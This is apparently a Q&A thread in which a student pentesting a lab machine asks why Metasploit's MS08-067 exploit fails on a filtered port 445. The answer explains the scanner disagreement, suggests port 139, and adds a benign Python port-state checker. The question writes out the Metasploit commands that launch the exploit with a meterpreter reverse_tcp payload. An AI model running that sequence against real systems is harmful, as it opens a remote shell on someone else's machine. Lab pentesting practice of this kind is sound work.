Exploiting through a filtered port

  • I'm doing some pentesting against a machine the lecturer set up in the lab. NMAP shows port 445 to be filtered and Nessus confirms the ms08_067 vulnerability is present on that machine.

    I tried running Metasploit against it the normal way:

    use exploit/windows/smb/ms08_067_netapi
    set RHOST TARGET_IP
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST MY_IP
    exploit

    It tells me:

    [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.2:445)

    I'm guessing the exploit is failing because port 445 is filtered. The thing that has me puzzled is that Nessus can apparently check that the vulnerability is present. Since Nessus can do that through the filtered port, is there a way I can launch the exploit through a filtered port? Are there any Metasploit settings that need to be arranged?

    I assume 192.168.2.2 is the TARGET_IP?

  • GdD (Correct answer, 7 years ago)

    You have contradictory information: Nmap says the port is filtered, but Nessus says that the vulnerability is present on the system. They cannot both be true; one of these must be wrong. Given that Metasploit is unable to connect, it is likely that Nessus is reporting incorrectly, or is basing the vulnerability report on information gleaned from other open ports. If you look at Tenable's page on that advisory you will see that Nessus can test for it using port 139 or port 445, so 139 is probably open, and may be exploitable.
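    A small added example (not the asker's or the answerer's code) that reproduces the reasoning above: it classifies TCP 139 and 445 the way Nmap reports them by looking at how a plain socket connect fails, then maps the two states onto the answer's explanation. It assumes Python 3 and a lab host reachable from the scanning machine; the offline self-check uses 127.0.0.1 only.

```python
import socket
import sys

SMB_PORTS = (139, 445)

def classify_port(host, port, timeout=3.0):
    """Classify a TCP port the way Nmap reports it.

    open        - the three-way handshake completes
    closed      - the host answers with RST (ConnectionRefused, which is also what
                  the Rex::ConnectionRefused error from Metasploit corresponds to)
    filtered    - nothing comes back before the timeout (packets dropped by a firewall)
    unreachable - no route or another network error
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except socket.timeout:
        return "filtered"
    except OSError:
        return "unreachable"
    finally:
        s.close()

def check_smb_ports(host, timeout=3.0):
    """State of both ports the Nessus plugin can use for this check."""
    return {p: classify_port(host, p, timeout) for p in SMB_PORTS}

def reconcile(states):
    """Map the two port states onto the answer's explanation of the contradiction."""
    if states.get(445) == "open":
        return "smb-over-445"   # scanners did not disagree after all
    if states.get(139) == "open":
        return "smb-over-139"   # Nessus most likely tested over 139
    return "no-smb-path"        # finding came from other ports, or is wrong

def self_check():
    """Offline demonstration on 127.0.0.1: one listening port, then the same port closed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    while_open = classify_port("127.0.0.1", port, 1.0)
    srv.close()
    after_close = classify_port("127.0.0.1", port, 1.0)
    return while_open, after_close

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # lab host, constructed default
    states = check_smb_ports(target)
    print(states, reconcile(states))
```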

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM